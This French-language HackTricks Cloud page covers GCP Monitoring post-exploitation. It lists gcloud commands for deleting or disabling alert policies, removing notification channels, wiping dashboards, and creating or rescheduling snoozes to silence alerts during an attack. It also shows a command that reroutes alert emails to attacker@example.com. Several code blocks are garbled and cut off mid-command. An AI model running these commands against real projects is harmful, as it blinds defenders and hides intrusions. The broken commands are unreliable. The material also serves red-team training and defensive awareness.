HackTricks CloudGCP - Monitoring Post Exploitation
Tip
Apprenez et pratiquez le hacking AWS :
HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP :HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Soutenir HackTricks
- Vérifiez les plans d’abonnement !
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez-nous sur Twitter 🐦 @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PR au HackTricks et HackTricks Cloud dépôts github.
Monitoring
Pour plus d’informations, consultez :
Pour d’autres façons de perturber les logs, consultez :
GCP - Logging Post Exploitation
monitoring.alertPolicies.delete
Supprimer une alert policy :
Supprimer une alert policy
```bash gcloud alpha monitoring policies deletemonitoring.alertPolicies.update
Perturber une politique d’alerte :
Perturber la politique d'alerte
```bash # Disable policy gcloud alpha monitoring policies updateRemove all notification channels
gcloud alpha monitoring policies update
Chnage notification channels
gcloud alpha monitoring policies update
Modify alert conditions
gcloud alpha monitoring policies update
or use –policy-from-file
</details>
### `monitoring.dashboards.update`
Modifier un dashboard pour le perturber :
<details>
<summary>Perturber le dashboard</summary>
```bash
# Disrupt dashboard
gcloud monitoring dashboards update <dashboard> --config='''
displayName: New Dashboard with New Display Name
etag: 40d1040034db4e5a9dee931ec1b12c0d
gridLayout:
widgets:
- text:
content: Hello World
'''
monitoring.dashboards.delete
Supprimer un tableau de bord :
Supprimer le tableau de bord
```bash # Delete dashboard gcloud monitoring dashboards deletemonitoring.snoozes.create
Empêcher les politiques d’alerte de générer des alertes en créant un snoozer :
Créer un snoozer pour arrêter les alertes
```bash # Stop alerts by creating a snoozer gcloud monitoring snoozes create --display-name="Maintenance Week" \ --criteria-policies="projects/my-project/alertPolicies/12345,projects/my-project/alertPolicies/23451" \ --start-time="2023-03-01T03:00:00.0-0500" \ --end-time="2023-03-07T23:59:59.5-0500" ```monitoring.snoozes.update
Mettre à jour la planification d’un snoozer pour empêcher la création d’alertes lorsque l’attaquant s’y intéresse :
Mettre à jour la planification du snoozer
```bash # Modify the timing of a snooze gcloud monitoring snoozes updateodify everything, including affected policies
gcloud monitoring snoozes update
</details>
### `monitoring.notificationChannels.delete`
Supprimer un canal configuré :
<details>
<summary>Supprimer le canal de notification</summary>
```bash
# Delete channel
gcloud alpha monitoring channels delete <channel>
monitoring.notificationChannels.update
Mettre à jour les libellés d’un canal pour le perturber :
Mettre à jour les libellés du canal de notification
```bash # Delete or update labels, for example email channels have the email indicated here gcloud alpha monitoring channels update CHANNEL_ID --clear-channel-labels gcloud alpha monitoring channels update CHANNEL_ID --update-channel-labels=email_address=attacker@example.com ```Tip
Apprenez et pratiquez le hacking AWS :
Apprenez et pratiquez le hacking GCP :Soutenir HackTricks
- Vérifiez les plans d’abonnement !
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez-nous sur Twitter 🐦 @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PR au HackTricks et HackTricks Cloud dépôts github.